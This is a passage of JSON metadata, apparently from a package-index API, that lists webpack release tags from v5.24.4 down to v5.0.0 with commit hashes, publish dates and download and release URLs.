e.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-1